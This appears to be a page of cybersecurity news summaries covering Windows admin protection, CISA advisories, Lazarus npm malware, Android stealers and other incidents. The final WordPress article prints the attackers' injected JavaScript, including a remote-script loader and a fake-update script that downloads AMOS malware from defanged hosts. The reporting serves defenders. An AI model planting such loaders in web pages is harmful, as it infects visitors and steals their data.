Tuesday, February 11, 2025
Follow us On Linkedin
Home Blog Page 18

Microsoft Enhances Windows 11 Security with Admin Protection to Prevent Crowdstrike-Like Incident

By
Aman Mishra
-
Microsoft Enhances Windows 11 Security

Microsoft has introduced “Administrator Protection” (AP), a sophisticated security feature aimed at elevating Windows operating system security by redefining how administrative privileges are managed and reducing the risk of privilege escalation attacks.

Detailed in its latest technical blog post, this feature marks a pivotal step in advancing user protection and mitigating vulnerabilities rooted in legacy designs.

Key Principles of Administrator Protection

Administrator Protection is built on five foundational principles designed to tighten security boundaries while maintaining usability.

It enforces the Principle of Least Privilege, ensures administrative privileges persist only for active tasks, and establishes strict separation between elevated and non-elevated user contexts.

Additionally, elevation actions must be deliberate, and applications can now obtain more granular, task-specific elevated privileges rather than relying on broad, upfront elevation models common in User Account Control (UAC).

Crowdstrike-Like Incident
Error Dialog

Among the transformative changes, System Managed Administrator Accounts (SMAA) play a central role.

These local administrator accounts are dynamically linked to standard user accounts, ensuring administrative privileges are accessed securely.

SMAAs are created as password-less accounts with strict logon constraints, leveraging robust process validations and allowlists to prevent unauthorized access.

Addressing Legacy Vulnerabilities

Microsoft’s approach directly addresses long-standing vulnerabilities with the previous split-token administrator model.

Historically, issues like registry and file system exploitation enabled attackers to elevate privileges, bypassing UAC mechanisms.

Classic attacks, such as leveraging the Event Viewer’s registry keys or exploiting Task Scheduler’s environment variables, are now rendered ineffective due to the decoupling of user profiles and the removal of shared registry hives between standard and elevated contexts.

Furthermore, Administrator Protection discontinues auto-elevation introduced in Windows 7, which had inadvertently expanded the attack surface.

The removal of auto-elevation mitigates 92 auto-elevating COM interfaces, 11 DLL hijacking risks, and 23 auto-elevating apps.

Despite the trade-off in user convenience, this shift substantially reduces the risk of privilege escalation by requiring explicit consent through Windows Hello or other credential-based mechanisms for elevation.

Beyond security, AP aims to enhance user experience by eliminating dead-end pathways that previously rendered essential functionalities inaccessible to standard users.

For instance, tools like the Group Policy Editor (gpedit.exe), which were unusable when launched by standard users, can now leverage AP’s structured elevation pathways for seamless functionality.

Crowdstrike-Like Incident
GPEDIT.exe in an error state

However, challenges remain. Microsoft acknowledges that specific attack vectors, including token manipulation and DLL hijacking in insecure paths, still require attention.

While mitigated significantly, these vulnerabilities highlight the need for continuous updates to close emerging gaps.

Administrator Protection represents a groundbreaking advancement in Windows security architecture.

Though the feature requires adjustment from users accustomed to auto-elevation workflows, its benefits in mitigating privilege escalation attacks vastly outweigh the temporary inconvenience.

Microsoft has urged developers to update applications for compatibility with AP, signaling its intent to make this feature the default in future releases.

For security-conscious users, Administrator Protection is poised to redefine secure computing on Windows, offering a robust framework to protect against sophisticated threats while encouraging feedback for further refinement.

Are you from SOC/DFIR Teams? – Analyse Malware Files & Links with ANY.RUN Sandox -> Try for Free

CISA Releases Seven ICS Advisories to Strengthen Cybersecurity Posture

By
Divya
-
CISA Releases Seven ICS Advisories to Strengthen Cybersecurity Posture

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued seven Industrial Control Systems (ICS) advisories, highlighting critical vulnerabilities in systems vital to industrial and operational processes.

These advisories aim to enhance awareness and encourage mitigation strategies to maintain the security and integrity of ICS environments. Below, we delve into the details of each advisory and its associated vulnerabilities.

CISA Releases Seven ICS Advisories

1. B&R Automation Runtime (ICSA-25-028-01)

  • CVE: CVE-2024-8603
  • Vulnerability: Use of a Broken or Risky Cryptographic Algorithm

Remote exploitation of this vulnerability could allow attackers to impersonate legitimate services on impacted devices.  

The vulnerability results from the use of unsafe cryptographic algorithms in the SSL/TLS component. If exploited, attackers could potentially intercept or manipulate communications between devices.

2. Schneider Electric Power Logic (ICSA-25-028-02)

  • CVEs: CVE-2024-10497, CVE-2024-10498
  • Vulnerabilities: Authorization Bypass Through User-Controlled Key, Improper Restriction of Operations within the Bounds of a Memory Buffer

Exploitation of these vulnerabilities could lead to unauthorized data modifications or denial of service (DoS) affecting device web interfaces.

 The flawed implementation of user-controlled keys (CVE-2024-10497) could allow attackers to manipulate configurations outside defined privileges.

Additionally, memory buffer issues (CVE-2024-10498) enable attackers to send malformed requests, potentially causing system malfunctions.

3. Rockwell Automation FactoryTalk (ICSA-25-028-03)

  • CVEs: CVE-2025-24479, CVE-2025-24480
  • Vulnerabilities: Incorrect Authorization, OS Command Injection

Attackers exploiting these flaws could execute commands with elevated privileges, severely impacting system integrity.

 Improper authorization configurations (CVE-2025-24479) and failure to sanitize inputs (CVE-2025-24480) allow attackers to inject malicious OS commands, leading to code execution and system compromise.

4. Rockwell Automation FactoryTalk View Site Edition (ICSA-25-028-04)

  • CVEs: CVE-2025-24481, CVE-2025-24482
  • Vulnerabilities: Incorrect Permission Assignment for Critical Resources, Code Injection

Exploitation could result in unauthorized access to configuration files and the execution of malicious code.  

Unauthorized permissions (CVE-2025-24481) and vulnerabilities enabling DLL injection (CVE-2025-24482) pose significant risks to system configuration and security.

5. Rockwell Automation DataMosaix Private Cloud (ICSA-25-028-05)

  • CVEs: CVE-2020-11656, CVE-2024-11932
  • Vulnerabilities: Exposure of Sensitive Information, Third-Party Dependency Issues

Sensitive data exposure and vulnerabilities in third-party components could allow attackers to overwrite files and execute malicious actions.  

A path traversal vulnerability (CVE-2024-11932) and outdated SQLite implementation (CVE-2020-11656) create opportunities for attackers to compromise reports and user projects.

6. Schneider Electric RemoteConnect and SCADAPack x70 Utilities (ICSA-25-028-06)

  • CVE: CVE-2024-12703
  • Vulnerability: Deserialization of Untrusted Data

Malicious project files opened by users could compromise system confidentiality, integrity, or even lead to remote code execution.

Improper deserialization processes allow attackers to embed malicious code in project files, compromising workstation security.

7. BD Diagnostic Solutions Products (ICSMA-24-352-01)

  • CVE: CVE-2024-10476
  • Vulnerability: Use of Default Credentials

Default credentials used in BD products could allow unauthorized access, modification, or deletion of sensitive data, potentially shutting down systems.  

Default credentials (CWE-1392) pose a significant risk, enabling attackers to infiltrate systems and access protected health and personally identifiable information (PHI/PII).

CISA’s release of these advisories underscores the urgent need for industrial organizations to address vulnerabilities in ICS environments.

Organizations are encouraged to follow CISA’s mitigation recommendations, including implementing patches, enforcing secure configurations, and regularly updating software.

By proactively addressing these vulnerabilities, organizations can bolster their cybersecurity posture and protect critical infrastructure from malicious threats.

Collect Threat Intelligence with TI Lookup to improve your company’s security - Get 50 Free Request

Lazarus Group Drop Malicious NPM Packages in Developers Systems Remotely

By
Aman Mishra
-
Lazarus Group

In a recent discovery by Socket researchers, a malicious npm package named postcss-optimizer has been identified as an operation spearheaded by the North Korean state-sponsored group, Lazarus Advanced Persistent Threat (APT).

Tied to past campaigns and employing code-level similarities, the package is linked to the Contagious Interview subgroup of Lazarus, infamously targeting software developers through sophisticated malware delivery mechanisms.

The malicious package, masquerading as the legitimate and highly popular postcss library (with over 16 billion downloads), has been maliciously downloaded 477 times.

Once installed, it deploys BeaverTail malware, which serves dual purposes as an infostealer and a malware loader.

Its second-stage payload is suspected to be InvisibleFerret, a potent backdoor that aligns with Lazarus’ software supply chain exploitation tactics.

As of today, the package remains available in the npm repository, though Socket has requested its removal.

Sophisticated Techniques Exploit Supply Chains

The “postcss-optimizer” package mimics the original postcss library with a deceptive npm registry user alias named “yolorabbit.”

Lazarus Group
A screenshot of the legitimate postcss package on the npm registry.

Researchers from Unit 42 previously uncovered similar attacks in 2022, where the group used staged interview processes to lure developers into downloading malicious npm packages.

Upon installation, these packages execute staged malware attacks, beginning with reconnaissance and persistence establishment and eventually exfiltrating data or deploying secondary payloads.

The BeaverTail malware associated with this campaign employs obfuscation techniques, such as variable renaming and control flow flattening, to evade static analysis.

Once activated, the malware targets systems across Windows, macOS, and Linux.

It collects sensitive data, including credentials, browser cookies, and cryptocurrency wallet files, sending them to a hardcoded command-and-control (C2) server.

Additionally, BeaverTail facilitates long-term persistence through registry key manipulation or startup script injections, regularly fetching and executing additional payloads.

Financial Targeting

A detailed analysis of the malware revealed its focus on data theft, particularly targeting cryptocurrency wallets and financial credentials.

The malware scans for browser extensions associated with wallets like MetaMask and Phantom while also exfiltrating Solana wallet keys and macOS login keychain data.

It systematically searches user directories for locally stored credentials and transmits the stolen data to its C2 infrastructure using HTTP POST requests.

The code also includes a fallback mechanism to download additional payloads using alternate methods like cURL, ensuring resilience against network restrictions.

These capabilities align with Lazarus’ preference for financial theft coupled with broader espionage goals.

This incident underlines the persistent threat posed by APT groups exploiting open-source ecosystems for malware distribution.

Organizations must adopt robust measures to secure their software supply chains.

Proactive techniques such as automated dependency audits, behavior-based analysis tools, and real-time monitoring for suspicious npm packages can help mitigate risks.

Tools like the Socket GitHub integration and CLI add layers of defense by flagging anomalies in open-source packages before deployment.

The postcss-optimizer campaign serves as a stark reminder of how malicious actors exploit developer trust and open-source tools to infiltrate systems.

Vigilance, combined with advanced security tooling, remains critical to countering such sophisticated software supply chain threats.

Are you from SOC/DFIR Teams? – Analyse Malware Files & Links with ANY.RUN Sandox -> Try for Free

Lazarus Hackers Tamper with Software Packages to Gain Backdoor Access to the Victims Device

By
Aman Mishra
-
Backdoor Access

A recent investigation conducted by STRIKE, a division of SecurityScorecard, has unveiled the intricate and far-reaching operation of the Lazarus Group, a North Korean advanced persistent threat (APT) group.

Dubbed “Operation Phantom Circuit,” the campaign highlights a deliberate and sophisticated effort to infiltrate global systems through compromised software supply chains and advanced Command-and-Control (C2) infrastructure.

The operation primarily targeted developers and the cryptocurrency sector, with critical data being siphoned back to Pyongyang.

The investigation revealed that Lazarus employed multiple C2 servers, which became active in September 2024 and featured an additional hidden operational layer.

The servers housed a React-based web-admin interface integrated with Node.js APIs, enabling centralized control.

Through these interfaces, attackers could systematically manage exfiltrated data, oversee infected systems, and execute payload delivery.

This consistent design was evident across all analyzed C2 servers, suggesting a high degree of operational maturity and standardization.

Supply Chain Intrusion and Global Impact

Lazarus exploited legitimate software packages by embedding obfuscated backdoors, tricking developers into deploying compromised applications.

These supply chain attacks targeted a broad audience, especially in the cryptocurrency domain, leading to the execution of malicious payloads on host systems.

STRIKE’s analysis identified hundreds of victims across multiple campaigns, with data traces pointing back to Lazarus’s infrastructure in North Korea.

The operation, which spanned from November 2024 to January 2025, utilized obfuscation tactics and layered infrastructure to evade detection.

Key elements of the infrastructure included Astrill VPNs, intermediate proxies registered to Russian entities, and C2 servers managed through ports like 1224 and 1245.

NetFlow analysis and connection logs allowed STRIKE to confidently trace these activities back to North Korean IPs, including the limited range of addresses assigned to Pyongyang.

Advanced Obfuscation Techniques

Lazarus’s operations epitomized strategic obfuscation. Traffic was anonymized through VPNs and proxies, blending malicious activity with legitimate network traffic to complicate detection.

For example, traffic initiated from Pyongyang was routed through Astrill VPN exit points and subsequently masked via intermediate proxies in Russia.

The C2 servers, hosted on infrastructure provided by entities like Stark Industries, were used to exfiltrate sensitive data, including credentials and system information.

Key findings include the use of a hidden web-admin panel on C2 servers, accessible only through a secured login.

This panel provided attackers with granular control over exfiltrated data, displaying victim details and facilitating data manipulation through custom-built interfaces.

Additionally, the Lazarus Group’s reliance on commercial services such as Dropbox for data transfer further emphasized their robust operational security measures.

The findings from Operation Phantom Circuit underscore the urgent need for intensified cybersecurity measures, particularly in the software supply chain.

Organizations are advised to implement rigorous code signing and verification processes, enhance monitoring of network traffic, and deploy proactive defenses against evolving tactics employed by APT groups like Lazarus.

With over 233 victims identified globally in the campaign’s latest phase, including a significant concentration in India and Brazil, the operation serves as a stark reminder of the vulnerabilities that sophisticated actors can exploit.

Industries, especially those handling sensitive or financial data, must prioritize collaborative threat intelligence sharing and adopt advanced detection tools to counter such persistent threats.

Are you from SOC/DFIR Teams? – Analyse Malware Files & Links with ANY.RUN Sandox -> Try for Free

TeamViewer Clients Vulnerability Leads to Privilege Escalation

By
Divya
-
TeamViewer Clients Vulnerability Leads to Privilege Escalation

TeamViewer, a widely used remote access software, has announced a critical vulnerability in its Windows clients.

The company disclosed on January 28, 2025, that its software is affected by a security flaw that could allow local attackers to escalate privileges.

The vulnerability tracked as CVE-2025-0065, has been assigned a Common Vulnerability Scoring System (CVSS) rating of 7.8, placing it in the “High” severity range.

Details of CVE-2025-0065: Improper Neutralization of Argument Delimiters

The vulnerability resides in the TeamViewer_service.exe component of TeamViewer Full Client and Host on Windows systems.

It is classified as CWE-88: Improper Neutralization of Argument Delimiters in a Command (‘Argument Injection’).

An attacker with local, unprivileged access to a Windows system could exploit this flaw by injecting malicious arguments into the vulnerable component, ultimately escalating their privileges.

While this vulnerability does not allow for remote exploitation, it poses a significant risk in shared or multi-user environments, such as corporate networks or publicly accessible systems.

Fortunately, TeamViewer confirmed that, to date, there is no evidence that this vulnerability has been exploited in the wild.

Affected Products and Versions

The vulnerability impacts a range of TeamViewer products for Windows, including:

  • TeamViewer Full Client (Windows): Versions earlier than 15.62, 14.7.48799, 13.2.36226, 12.0.259319, and 11.0.259318.
  • TeamViewer Host (Windows): Versions earlier than 15.62, 14.7.48799, 13.2.36226, 12.0.259319, and 11.0.259318.

Users running any of these older versions are strongly urged to upgrade immediately.

TeamViewer has released version 15.62 to address this issue. The company recommends users update their software to the latest available version as soon as possible.

Updated versions can be downloaded from TeamViewer’s official website. For organizations managing multiple installations, TeamViewer Tensor customers are advised to prioritize these updates across their systems to prevent potential exploitation.

The vulnerability was identified by an anonymous contributor working with Trend Micro Zero Day Initiative and responsibly disclosed to TeamViewer.

This collaboration highlights the importance of coordinated disclosure efforts in maintaining software security. TeamViewer’s proactive approach to addressing the vulnerability underscores its commitment to ensuring the safety of its users. 

TeamViewer users are advised to stay informed about security updates and implement best practices, such as restricting physical access to devices and monitoring privilege use, to further mitigate risks.

Collect Threat Intelligence with TI Lookup to improve your company’s security - Get 50 Free Request

Tria Stealer Malware Exploits Android Devices to Harvest SMS Data

By
Divya
-
Tria Stealer Malware Exploits Android Devices to Harvest SMS Data

Cybersecurity researchers have uncovered a sophisticated Android malware campaign known as “Tria Stealer,” which is targeting users in Malaysia and Brunei to collect sensitive information such as SMS data, call logs, WhatsApp messages, and emails.

The malware campaign, which has been active since March 2024, uses wedding invitations as a lure to trick victims into downloading malicious apps.

This campaign showcases the growing sophistication of Android threats, as well as the potential risks of data breaches and account hijacking.

How Tria Stealer Operates

The Tria Stealer malware disguises itself as a legitimate Android app, often themed around wedding invitations. Victims are tricked into installing the app by receiving messages via WhatsApp or Telegram, often sent by compromised accounts.

Once downloaded and installed, the app requests dangerous permissions, such as access to SMS, call logs, and network state. It also masquerades as a system settings app to avoid suspicion.

Upon installation, Tria Stealer collects sensitive information, including SMS messages, call logs, device details, and even messages from apps like WhatsApp and Gmail.

This data is then exfiltrated to the attackers through Telegram bots, which act as Command and Control (C2) servers.

The researchers identified two versions of Tria Stealer, with the second version, released in August 2024, introducing advanced features.

Overview of the Tria Stealer campaign
Overview of the Tria Stealer campaign

The malware utilizes the BroadcastReceiver function to monitor incoming messages and calls, enabling it to intercept critical information like one-time passwords (OTPs) and transaction authorization codes (TACs).

These codes are then used to hijack accounts on platforms such as WhatsApp, Telegram, and banking applications.

Additionally, newer variants of the malware include functionality for stealing data from notifications posted by popular messaging and email apps, including Gmail, WhatsApp Business, and Yahoo Mail.

stealing data from notifications posted by popular messaging and email apps
stealing data from notifications posted by popular messaging and email apps

The stolen data is repackaged into specific formats and sent to different Telegram bots based on its type, showcasing an organized approach by the threat actors.

Consequences of the Attack

Once Tria Stealer compromises accounts, it serves two primary purposes:

  1. Distribution of Malware: The malware sends the malicious app link to the victim’s contacts via group chats and direct messages, tricking more users into downloading it and perpetuating the infection.
  2. Financial Fraud: Impersonating the account owner, attackers request money transfers from the victim’s contacts, often resulting in financial losses.

Experts warn that the stolen information could also be used for other nefarious purposes, such as resetting account passwords, accessing online banking systems, or compromising additional platforms reliant on SMS or email authentication.

Suspected Origin and Target Victims

Investigations suggest that the campaign is orchestrated by an Indonesian-speaking threat actor, evidenced by embedded Indonesian language strings and naming patterns in the malware.

While no individual targeting has been observed, the majority of victims are in Malaysia and Brunei, with Malaysia being the most affected.

A similar malware campaign, UdangaSteal, was active in Southeast Asia in 2023 and early 2024. However, researchers do not attribute Tria Stealer to the same threat actor, as it demonstrates unique code structures, different Telegram bot setups, and enhanced functionality.

Given the rise of such sophisticated malware, cybersecurity experts recommend the following precautions:

  • Avoid Downloading APK Files from Unknown Sources: Only download apps directly from trusted sources like the Google Play Store.
  • Verify Messages Before Clicking: Be cautious of messages requesting app installations, even if they appear to come from friends or trusted contacts.
  • Enable Two-Factor Authentication (2FA): Use 2FA wherever possible to secure your accounts.
  • Use Reliable Security Solutions: Install mobile antivirus tools to detect and block malware.

The Tria Stealer malware campaign highlights the evolving tactics of cybercriminals targeting Android users.

By leveraging social engineering techniques and advanced data exfiltration methods, this malware poses a serious threat to personal and financial security. Users are urged to remain vigilant and adopt best practices to safeguard against such attacks.

Collect Threat Intelligence with TI Lookup to improve your company’s security - Get 50 Free Request

Hackers Sell Compromised Emails and Google Ads Accounts on Dark Web

By
Divya
-
Hackers Sell Compromised Emails and Google Ads Accounts on Dark Web

A new wave of cybercrime is surfacing as hackers exploit compromised emails and digital advertising platforms to create a thriving underground economy.

This illegal marketplace, primarily hosted on the dark web, trades in aged and pre-verified accounts, offering tech-savvy criminals tools to bypass security mechanisms and perpetrate malicious activity.

The Illicit Trade of Verified Accounts

Following a detailed investigation, researchers uncovered over 100 newly registered domains in December 2024, predominantly marketing pre-verified and aged accounts for platforms such as Google Ads, email providers, and social media networks.

These accounts, often obtained via phishing scams, hacking, or other nefarious means, are highly sought after for their ability to evade account verification processes and utilize the inherent trust associated with aged profiles.

While some purchasers seek these accounts for benign uses, such as targeting specific regions or enhancing social media marketing, many turn them into tools of fraud, spam, and disinformation dissemination.

These activities underline the new challenges posed by these underground marketplaces in an increasingly interconnected digital world.

Notable Domains in the Illicit Ecosystem

Several domains have been identified as key players in this ecosystem, offering everything from cloud service accounts to social media pages.

These websites claim to provide “pre-verified” and “aged” accounts to buyers, with promises of complete control over the purchased accounts.

Premium and aged social media acc
Premium and aged social media acc

Cloud and Advertising Accounts for Sale

  1. Topcloudacc[.]com
    • Offers accounts for platforms like AWS, Google Ads, and Oracle Cloud.
    • Website Title: “Buy AWS Account | Best 32-vCPU & Credit Account – 2025″
  2. Acctrusted[.]com
    • Claims to specialize in cloud services, including AWS, Azure, and DigitalOcean accounts.
    • Website Title: “Buy AWS Accounts | Best Vcpu & Credit Account For Sale 2024″
  3. Buybhwaccounts[.]xyz
    • Markets ads accounts and cloud accounts alongside BHW profiles.
    • Website Title: “Buy BHW Accounts – BHW Accounts For Sale – buybhwaccounts[.]xyz”

Social Media and Email Accounts

  1. Regularpva[.]com
    • Sells social media and dating accounts, including Facebook, Instagram, Gmail, and Yahoo.
    • Website Title: “Buy Social Media Accounts – Social Media Pages for Sale – SecurePVA”
  2. Discordarena[.]com
    • Redirects from other domains and sells “premium aged Discord accounts.”
  3. Redditaccsbuy[.]com
    • Specializes in aged and verified Reddit accounts with built-up karma.
    • Website Title: “Reddit Accounts with Karma for Sale”

The investigation reveals a troubling development in the sale of aged Google Ads accounts. Research shows that 128 nearly identical websites, created in December 2024, operate as interconnected networks to sell these accounts.

google Ads
google Ads

Using private blog networks (PBNs) to manipulate search engine rankings, these sites aim to direct maximum traffic to their illicit marketplaces.

Aged Google Ads accounts are particularly valuable to buyers trying to bypass Google’s robust review mechanisms.

Aged Google Ads accounts
Aged Google Ads accounts

These accounts, perceived as less likely to be flagged for suspicious activity, are often used for unauthorized advertising campaigns or black-hat marketing tactics.

The sale of pre-verified and aged accounts poses a significant cybersecurity threat. These accounts fuel criminal enterprises, from financial fraud to the spread of disinformation, and create complexities for digital platforms striving to ensure user security.

As the underground market for these accounts grows, cybersecurity experts and tech companies face mounting pressure to address this evolving threat.

Enhanced security protocols, detection of account irregularities, and proactive measures against phishing scams may hold the key to combating this alarming trend in cybercrime.

Collect Threat Intelligence with TI Lookup to improve your company’s security - Get 50 Free Request

Cybercriminals Hijack Government Sites to Lauch Phishing Attacks

By
Aman Mishra
-
Phishing Attacks

Cybersecurity researchers have identified a persistent trend in which threat actors exploit vulnerabilities in government websites to further phishing campaigns.

Based on data spanning November 2022 through November 2024, malicious actors have misused numerous .gov top-level domains (TLDs) across more than 20 countries.

Exploitation of Legitimate .Gov Domains

While .gov domains are generally trusted by users, this trust is being exploited to host phishing pages, redirect victims to malicious links, or even serve as command and control (C2) servers.

Open redirects, a type of vulnerability where web applications redirect users to external, malicious destinations, play a central role in these cyber campaigns.

Exploited .gov domains are often embedded in phishing emails, allowing attackers to bypass secure email gateways (SEGs) that inherently trust government-linked domains.

Victims, unaware of the redirection, are lured into sharing sensitive credentials on phishing pages.

Role of Liferay Platforms

A significant portion of the abuse arises from open redirect exploits linked to CVE-2024-25608, a vulnerability in the widely used Liferay digital experience platform.

Nearly 60% of observed phishing campaigns involving .gov domains carried a “noSuchEntryRedirect” path indicative of this specific exploit.

Liferay’s adoption across multiple governmental organizations may have contributed to this extensive abuse.

The vulnerability allows attackers to redirect users to credential phishing pages or intermediary sites.

Although such vulnerabilities are not exclusive to government websites, their presence underscores the importance of vigilance among web developers.

According to the Cofense report, governments and organizations must prioritize patch management and security auditing to mitigate risks stemming from outdated or unpatched software.

While .gov domains affiliated with the United States accounted for only 9% of all exploited domains, they remain the third most-targeted globally.

All observed cases of U.S.-specific .gov domain abuse involved open redirects, primarily linked to CVE-2024-25608.

Microsoft-themed phishing campaigns were particularly prominent, often featuring emails impersonating legitimate entities and bypassing widely used SEGs such as Microsoft ATP, Cisco IronPort, and Proofpoint.

Statistical analysis reveals that the majority of abuse originates from a small subset of government domains.

For example, Brazilian .gov domains emerged as the most exploited, but the misuse was concentrated in a limited number of unique domains.

This pattern was consistent across other countries, suggesting targeted exploitation rather than widespread vulnerability.

In addition to redirect-based abuse, some compromised .gov domain email addresses have been repurposed as C2 infrastructure for malware, such as Agent Tesla Keylogger and StormKitty.

Despite these incidents, the frequency remains low, highlighting that governments may be taking steps to safeguard email systems.

The exploitation of .gov domains for phishing underscores the broader challenge of securing trusted digital infrastructure.

With government websites serving as high-value targets, sustained monitoring, timely patching, and security awareness at the organizational level are critical to mitigating risks.

As threat actors continue to innovate, collaborative efforts in cybersecurity will play a pivotal role in defending against evolving threats.

Are you from SOC/DFIR Teams? – Analyse Malware Files & Links with ANY.RUN Sandox -> Try for Free

Hackers Can Exploit AI Platform to Achieve Root Access via RCE Vulnerability

By
Aman Mishra
-
RCE Vulnerability

In a critical development within the AI industry, researchers at Noma Security have disclosed the discovery of a high-severity Remote Code Execution (RCE) vulnerability in Lightning AI Studio, a widely adopted AI development platform.

The vulnerability, assigned a CVSS score of 9.4, was found to enable attackers to execute arbitrary commands with root privileges, posing significant threats such as data exfiltration and system compromise.

The issue has since been resolved in close collaboration with Lightning AI.

Vulnerability Overview

The RCE vulnerability stemmed from a hidden URL parameter called command, embedded within Lightning AI Studio’s terminal functionality.

This parameter, though concealed from users, could be manipulated to execute malicious commands.

Attackers could craft a Base64-encoded payload to encode commands and append them to user-specific URLs, exploiting the platform’s lack of input sanitization.

For instance, an attacker could embed a command to recursively delete all files or retrieve sensitive AWS metadata, including access tokens, and redirect them to a remote server.

The exploit relied on publicly accessible details such as usernames and studio paths, which attackers could glean from Lightning AI’s shared Studio templates.

Victims could be targeted via malicious links, shared through email or public forums, that triggered the exploit upon a single click.

Lightning AI Studio operates as a flexible, cloud-based AI development platform, supporting various AI workflows such as training and deployment.

With features such as a VSCode-like interface and persistent environments, it has gained popularity among enterprises and developers.

However, vulnerabilities in its handling of user-controllable inputs, such as hidden URL parameters, made it susceptible to this critical exploit.

The URL schema for Lightning AI Studio links includes variables like PROFILE_USERNAME and STUDIO_PATH, uniquely identifying user studios.

Attackers leveraged these variables to craft malicious URLs, redirecting authenticated users to terminals embedded with harmful commands.

Impact of the Exploit

The implications of this exploit underscored its criticality.

Attackers could potentially:

  • Execute Arbitrary Commands: Using root privileges via authenticated user sessions to manipulate systems.
  • Exfiltrate Data: Sensitive metadata, such as AWS credentials, could be accessed and transferred to malicious servers.
  • Compromise Filesystems: Attackers could delete or modify crucial system files, disrupting operations.

Given the platform’s integration into enterprise-grade AI workflows, the risk of exploitation extended to sensitive AI models and data pipelines across shared environments.

Following responsible disclosure on October 14, 2024, Noma Security and Lightning AI collaborated to address the vulnerability swiftly. A fix was released by October 25, 2024.

Key takeaways from this incident included the need for robust input validation, adherence to the principle of least privilege, and avoidance of directly executing user-controlled inputs to prevent command injection vulnerabilities.

This discovery highlights the critical importance of integrating comprehensive security measures into AI development lifecycles.

As the industry continues to innovate rapidly, ensuring the resilience of platforms like Lightning AI remains paramount.

Noma Security’s efforts in uncovering and mitigating such threats underscore their commitment to protecting the AI ecosystem.

Are you from SOC/DFIR Teams? – Analyse Malware Files & Links with ANY.RUN Sandox -> Try for Free

10,000 WordPress Websites Hacked to Distributing MacOS and Microsoft Malware

By
Divya
-
10,000 WordPress Websites Hacked to Distributing MacOS and Microsoft Malware

Over 10,000 WordPress websites have been hijacked to deliver malicious software targeting both macOS and Windows users.

Researchers revealed this week how attackers leveraged vulnerabilities in outdated WordPress software and plugins to distribute malware via fake browser update pages presented through an iframe.

The malicious campaign delivers two distinct strains of malware:

  • AMOS (Atomic macOS Stealer): Targeting macOS users, this malware steals sensitive information such as passwords, browser data, and cryptocurrency wallets.
  • SocGholish: A known malware strain targeting Windows users, often disguised as fake browser updates to trick victims into installing it.

What makes this campaign particularly significant is that it represents the first known instance of these malware variants being delivered via a client-side attack.

Here are two of the largest domains identified across thousands of websites - blackshelter[.]org blacksaltys[.]com
Here are two of the largest domains identified across thousands of websites – blackshelter[.]org blacksaltys[.]com

Typically distributed by different groups, their presence together on compromised websites raises questions about collaboration or a single sophisticated threat actor.

How the Attack Works

The attackers embedded malicious JavaScript into compromised WordPress websites. The highly obfuscated script generates a fake Google Chrome update page within an iframe, tricking victims into downloading the malware.

Key Observations

  • Vulnerabilities in outdated WordPress versions (e.g., version 6.7.1) and plugins were exploited to inject malicious code.
  • The JavaScript used in the attack dynamically loads external malicious scripts while bypassing cache mechanisms:
(function(o, q, f, e, w, j) {

    w = q.createElement(f);

    j = q.getElementsByTagName(f)[0];

    w.async = 1;

    w.src = e;

    j.parentNode.insertBefore(w, j);

})(window, document, 'script', `https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de.js?qbsfsc=${Math.floor(Date.now() / 1000)}`);

The script halts browser activity, removes attributes from key HTML elements, and injects an iframe to display the fake update page.

Domains and Distribution

Researchers identified several malicious domains linked to the campaign, with blackshelter[.]org and blacksaltys[.]com among the most significant.

Sample Malicious Elements on Compromised Sites:

  • Script tags loading malicious JavaScript from external domains:
<script type="rocketlazyloadscript" src="https://blacksaltys[.]com/..."></script>
  • Prefetch DNS elements to enhance performance for malicious domains:
<link rel='dns-prefetch' href='//blacksaltys[.]com'>

macOS and Windows Malware Analysis

Researchers uncovered a script that dynamically generates and downloads the AMOS malware for macOS users:

<script>

(async () => {

    var btn = document.createElement("a");

    btn.href = `hxxps://extendedstaybrunswick[.]com/.../resty.php?eg=${Math.floor(Date.now() / 1000)}`;

    btn.download = "C_6.12.4.dmg";

    document.body.appendChild(btn);

    window.addEventListener("message", function (event) {

        if (event.data == "download") {

            setTimeout(() => btn.click(), 100);

        }

    });

})();

</script>

For Windows users, the SocGholish malware was delivered using similar mechanisms, disguised as a legitimate software update.

Analysis and Impact

The compromised websites were found to load malicious scripts hosted on domains including:

  • blacksaltys[.]com
  • objmapper[.]com
  • rednosehorse[.]com

A script hosted on deski.fastcloudcdn[.]com, flagged by researchers on CSide, showcased only a 17/96 detection rate on VirusTotal, indicating its sophistication and evasion techniques.

Both AMOS and SocGholish are commercially available malware and are known to be sold on underground platforms like Telegram.

The campaign’s ability to target both macOS and Windows users demonstrates the attackers’ evolving tactics and highlights the risks posed by outdated software.

Website administrators are urged to update WordPress installations and plugins immediately and deploy client-side monitoring tools to identify malicious scripts.

Affected users should run comprehensive malware scans and remain cautious of fake browser update prompts.

Collect Threat Intelligence with TI Lookup to improve your company’s security - Get 50 Free Request

1...171819...838Page 18 of 838

GBHackers on Security is a top cybersecurity news platform, delivering up-to-date coverage on breaches, emerging threats, malware, vulnerabilities, and global cyber incidents.

Company

Trending

Categories

Copyright @ 2016 - 2024 GBHackers On Security - All Rights Reserved